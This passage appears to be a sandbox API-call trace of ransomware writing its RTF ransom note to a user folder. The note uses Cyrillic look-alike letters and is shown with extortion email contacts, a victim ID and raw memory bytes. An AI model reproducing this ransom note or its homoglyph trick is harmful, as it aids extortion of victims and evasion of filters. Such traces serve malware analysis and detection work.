sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x25ad0d8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\np¿WD÷\x0fe^`Ì!II\x05\x8aUá³\x81Í|\x86e\x12 cG®n&lhkô\x09mË\x05\x9fös)$\x0bsã\x9d\x7fÉ\rý)sdÁ\x1bs0\x19­­Ê4ñAmÈ\x9b/Á\x86¶ó\x92\r\x7fËõ\x1aH\x985Z¾»}\"}Î4\x0e<,\\\x92 Ü3h¬bÖ|ÕÜ\x04õw\x16Æ\x87>²§Û3ÿPH\x03û¥g·nïß\x04¯Â#5c\x03ay\x0c$ç¨\x17ïWæ¼Ñù\x021+Ùv\x05ÌW.#\x8cJÈ\x99Ú°", lpUsedDefaultChar=0x0) returned 7247 [0078.902] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0078.908] CloseHandle (hObject=0x1f0) returned 1 [0078.908] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\BG85_INFO.rtf" (normalized: "c:\\users\\public\\pictures\\sample pictures\\bg85_info.rtf")) returned 0xffffffff [0078.908] GetLastError () returned 0x2 [0078.908] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\BG85_INFO.rtf" (normalized: "c:\\users\\public\\pictures\\sample pictures\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0079.026] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd 